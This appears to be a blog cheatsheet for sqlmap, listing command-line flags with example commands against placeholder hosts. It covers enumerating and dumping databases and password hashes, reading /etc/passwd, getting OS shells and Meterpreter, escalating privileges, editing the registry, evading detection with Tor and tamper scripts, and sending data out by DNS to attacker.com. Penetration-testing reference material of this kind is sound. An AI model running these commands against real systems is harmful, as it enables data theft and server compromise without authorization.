SQLMap Cheatsheet

The Ultimate SQL Injection Tool Reference Guide

Basic SQLMap Usage

Basic URL Test
sqlmap -u "http://example.com/page.php?id=1"
Test a URL for SQL injection vulnerabilities.
Check for WAF
sqlmap -u "http://example.com" --check-waf
Check if target is protected by a WAF/IPS/IDS.
List All Databases
sqlmap -u "http://example.com/page.php?id=1" --dbs
Enumerate available databases.
List Tables
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
List tables in a specific database.
Dump Table Data
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
Dump the contents of a specific table.
Batch Mode
sqlmap -u "http://example.com/page.php?id=1" --batch
Run in batch mode (use default choices).
Verbose Output
sqlmap -u "http://example.com/page.php?id=1" -v 3
Set verbosity level (0-6, default 1).
Save Session
sqlmap -u "http://example.com/page.php?id=1" --save
Save session data to a .sqlmap file.
Resume Session
sqlmap --resume session_file
Resume a saved session.

Target Specification

Direct Connection
sqlmap -d "mysql://user:pass@host:port/dbname"
Connect directly to the database.
Multiple Targets
sqlmap -m targets.txt
Scan multiple targets from a file.
Google Dork
sqlmap -g "inurl:index.php?id="
Process Google dork results as targets.
Log File
sqlmap -l logfile.log
Parse targets from Burp or WebScarab log.
Request File
sqlmap -r request.txt
Load HTTP request from a file.
Crawl Website
sqlmap -u "http://example.com" --crawl=2
Crawl website starting from given URL.
Sitemap
sqlmap -u "http://example.com" --sitemap=url
Parse target(s) from remote sitemap(.xml).

Request Configuration

HTTP Method
sqlmap -u "http://example.com" --method=POST
Force usage of specific HTTP method.
POST Data
sqlmap -u "http://example.com" --data="id=1"
Specify POST data string.
Parameter Testing
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id,cat"
Test specific parameter(s) for injection.
Skip Static Parameters
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
Skip testing of specific parameter(s).
Cookie Injection
sqlmap -u "http://example.com" --cookie="id=1" --level=2
Test for cookie-based injection.
User-Agent Injection
sqlmap -u "http://example.com" --user-agent="sqlmap" --level=3
Test for user-agent-based injection.
Referer Injection
sqlmap -u "http://example.com" --referer="http://google.com" --level=3
Test for referer-based injection.
Headers File
sqlmap -u "http://example.com" --headers="headers.txt"
Load additional headers from file.
HTTP Authentication
sqlmap -u "http://example.com" --auth-type=BASIC --auth-cred="user:pass"
Specify HTTP authentication credentials.
Proxy Usage
sqlmap -u "http://example.com" --proxy="http://127.0.0.1:8080"
Use a proxy to connect to the target.
Tor Routing
sqlmap -u "http://example.com" --tor --tor-type=SOCKS5 --check-tor
Route traffic through Tor network.
Delay Between Requests
sqlmap -u "http://example.com" --delay=1
Delay in seconds between each request.
Timeout
sqlmap -u "http://example.com" --timeout=30
Seconds to wait before timeout (default 30).
Retries
sqlmap -u "http://example.com" --retries=3
Retries when connection times out (default 3).
Random Agent
sqlmap -u "http://example.com" --random-agent
Use randomly selected HTTP User-Agent header.
Host Header
sqlmap -u "http://example.com" --host="custom.example.com"
Specify custom Host header.

Database Enumeration

Current User
sqlmap -u "http://example.com" --current-user
Get database current user.
Current Database
sqlmap -u "http://example.com" --current-db
Get database current database name.
Server Hostname
sqlmap -u "http://example.com" --hostname
Get database server hostname.
Check if DBA
sqlmap -u "http://example.com" --is-dba
Check if current user is DBA.
List Users
sqlmap -u "http://example.com" --users
List database users.
List Privileges
sqlmap -u "http://example.com" --privileges
List database users privileges.
User Password Hashes
sqlmap -u "http://example.com" --passwords
Enumerate user password hashes.
List Roles
sqlmap -u "http://example.com" --roles
List database roles.
List Databases
sqlmap -u "http://example.com" --dbs
List available databases.
List Tables
sqlmap -u "http://example.com" -D database_name --tables
List tables in a specific database.
List Columns
sqlmap -u "http://example.com" -D database_name -T table_name --columns
List columns in a specific table.
Dump Table
sqlmap -u "http://example.com" -D database_name -T table_name --dump
Dump table entries.
Dump Specific Columns
sqlmap -u "http://example.com" -D database_name -T table_name -C column1,column2 --dump
Dump specific columns from a table.
Count Table Entries
sqlmap -u "http://example.com" -D database_name -T table_name --count
Count number of entries in table.
Schema Enumeration
sqlmap -u "http://example.com" --schema
Enumerate database schema.
Search for Data
sqlmap -u "http://example.com" --search -T user
Search for tables/columns matching pattern.
Comments
sqlmap -u "http://example.com" --comments
Enumerate database comments.
DBMS Version
sqlmap -u "http://example.com" --banner
Get DBMS banner/version.

Injection Techniques

Test All Techniques
sqlmap -u "http://example.com" --technique=BEUSTQ
Test all SQL injection techniques (default).
Boolean-Based Blind
sqlmap -u "http://example.com" --technique=B
Boolean-based blind SQL injection.
Error-Based
sqlmap -u "http://example.com" --technique=E
Error-based SQL injection.
UNION Query
sqlmap -u "http://example.com" --technique=U
UNION query-based SQL injection.
Stacked Queries
sqlmap -u "http://example.com" --technique=S
Stacked queries SQL injection.
Time-Based Blind
sqlmap -u "http://example.com" --technique=T
Time-based blind SQL injection.
Inline Queries
sqlmap -u "http://example.com" --technique=Q
Inline queries SQL injection.
Second-Order Injection
sqlmap -u "http://example.com" --second-order="http://example.com/response.php"
Second-order SQL injection.
Test Parameter
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id"
Test specific parameter for injection.
Skip Static Parameters
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
Skip testing of specific parameter(s).
Custom Injection Point
sqlmap -u "http://example.com/page.php?id=1*" --prefix="'" --suffix="AND '1'='1"
Specify custom injection point with prefix/suffix.
Tamper Scripts
sqlmap -u "http://example.com" --tamper="between.py,randomcase.py"
Use tamper scripts to obfuscate injection data.
Level and Risk
sqlmap -u "http://example.com" --level=3 --risk=3
Set test level (1-5) and risk (1-3) for more thorough tests.

Optimization Options

Predict Output
sqlmap -u "http://example.com" --predict-output
Predict common queries output.
Keep-Alive
sqlmap -u "http://example.com" --keep-alive
Use persistent HTTP(s) connections.
Null Connection
sqlmap -u "http://example.com" --null-connection
Retrieve page length without actual HTTP response.
Threads
sqlmap -u "http://example.com" --threads=5
Max number of concurrent HTTP requests (1-10).
Optimize
sqlmap -u "http://example.com" -o
Turn on all optimization switches.
Force DNS Resolution
sqlmap -u "http://example.com" --force-dns
Force DNS resolution for all targets.
Fresh Queries
sqlmap -u "http://example.com" --fresh-queries
Ignore query results stored in session file.

Injection Options

DBMS Fingerprint
sqlmap -u "http://example.com" --fingerprint
Perform extensive DBMS version fingerprint.
String to Inject
sqlmap -u "http://example.com" --string="Welcome back"
String to match when query is evaluated to True.
Not String
sqlmap -u "http://example.com" --not-string="Error"
String to match when query is evaluated to False.
Regexp
sqlmap -u "http://example.com" --regexp="Welcome \w+"
Regexp to match when query is evaluated to True.
Code
sqlmap -u "http://example.com" --code=200
HTTP code to match when query is evaluated to True.
Text-Only
sqlmap -u "http://example.com" --text-only
Compare pages based only on the textual content.
Titles
sqlmap -u "http://example.com" --titles
Compare pages based only on their titles.
Union Columns
sqlmap -u "http://example.com" --union-cols=17-23
Range of columns to test for UNION query injection.
Union Char
sqlmap -u "http://example.com" --union-char=123
Character to use for bruteforcing number of columns.
Union From
sqlmap -u "http://example.com" --union-from=users
Table to use in FROM part of UNION query injection.
DNS Exfiltration
sqlmap -u "http://example.com" --dns-domain=attacker.com
Use DNS exfiltration for data retrieval.

Brute Force Options

Brute Force Tables
sqlmap -u "http://example.com" --common-tables
Bruteforce common tables names.
Brute Force Columns
sqlmap -u "http://example.com" --common-columns
Bruteforce common columns names.
Brute Force Files
sqlmap -u "http://example.com" --common-files
Bruteforce common files.
Brute Force Chars
sqlmap -u "http://example.com" --charset="0123456789abcdef"
Bruteforce charset for hash cracking.

File System Access

Read File
sqlmap -u "http://example.com" --file-read="/etc/passwd"
Read a file from the database server.
Write File
sqlmap -u "http://example.com" --file-write="local.txt" --file-dest="/remote/path/remote.txt"
Write a local file on the database server.
Directory List
sqlmap -u "http://example.com" --list-directories="C:/"
List directories on the database server.

Operating System Access

OS Shell
sqlmap -u "http://example.com" --os-shell
Prompt for an interactive OS shell.
OS Pwn
sqlmap -u "http://example.com" --os-pwn
Prompt for an OOB shell, Meterpreter or VNC.
OS Cmd
sqlmap -u "http://example.com" --os-cmd="id"
Execute an OS command.
OS Bof
sqlmap -u "http://example.com" --os-bof
Stored procedure buffer overflow exploitation.
Privilege Escalation
sqlmap -u "http://example.com" --priv-esc
Database process user privilege escalation.
MSF Path
sqlmap -u "http://example.com" --msf-path=/opt/metasploit
Local path where Metasploit Framework is installed.

Windows-Specific Options

Reg Read
sqlmap -u "http://example.com" --reg-read
Read a Windows registry key value.
Reg Add
sqlmap -u "http://example.com" --reg-add
Write a Windows registry key value.
Reg Del
sqlmap -u "http://example.com" --reg-del
Delete a Windows registry key value.
Reg Key
sqlmap -u "http://example.com" --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
Specify Windows registry key.
Reg Value
sqlmap -u "http://example.com" --reg-value="InstallPath"
Specify Windows registry key value.
Reg Data
sqlmap -u "http://example.com" --reg-data="C:\Program Files"
Specify Windows registry key value data.
Reg Type
sqlmap -u "http://example.com" --reg-type="REG_SZ"
Specify Windows registry key value type.

Miscellaneous Options

Parse Errors
sqlmap -u "http://example.com" --parse-errors
Parse and display DBMS error messages.
Cleanup
sqlmap -u "http://example.com" --cleanup
Clean up the DBMS from sqlmap specific UDF and tables.
Flush Session
sqlmap -u "http://example.com" --flush-session
Flush session files for current target.
Check Internet
sqlmap -u "http://example.com" --check-internet
Check Internet connection before assessing the target.
Alerts
sqlmap -u "http://example.com" --alert="ALERT"
Run host OS command(s) when SQL injection is found.
Answers
sqlmap -u "http://example.com" --answers="follow=Y"
Set predefined answers (e.g. “quit=N,follow=N”).
Beep
sqlmap -u "http://example.com" --beep
Beep on question and/or when SQL injection is found.
Dependencies
sqlmap -u "http://example.com" --dependencies
Check for missing (optional) sqlmap dependencies.
Disable Coloring
sqlmap -u "http://example.com" --disable-coloring
Disable console output coloring.
Google Page
sqlmap -u "http://example.com" --gpage=2
Use Google dork results from specified page number.
Page Compare
sqlmap -u "http://example.com" --page-compare
Compare pages based on their content length.
Skip WAF
sqlmap -u "http://example.com" --skip-waf
Skip heuristic detection of WAF/IPS/IDS protection.
Smart
sqlmap -u "http://example.com" --smart
Conduct thorough tests only if positive heuristic(s).
Sqlmap Shell
sqlmap --sqlmap-shell
Prompt for an interactive sqlmap shell.
Wizard
sqlmap --wizard
Simple wizard interface for beginner users.

This cheatsheet is for educational purposes only. Always ensure you have proper authorization before testing any system for SQL injection vulnerabilities.

Related Articles

Discover more from Cyber Samir

Subscribe to get the latest posts sent to your email.

Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *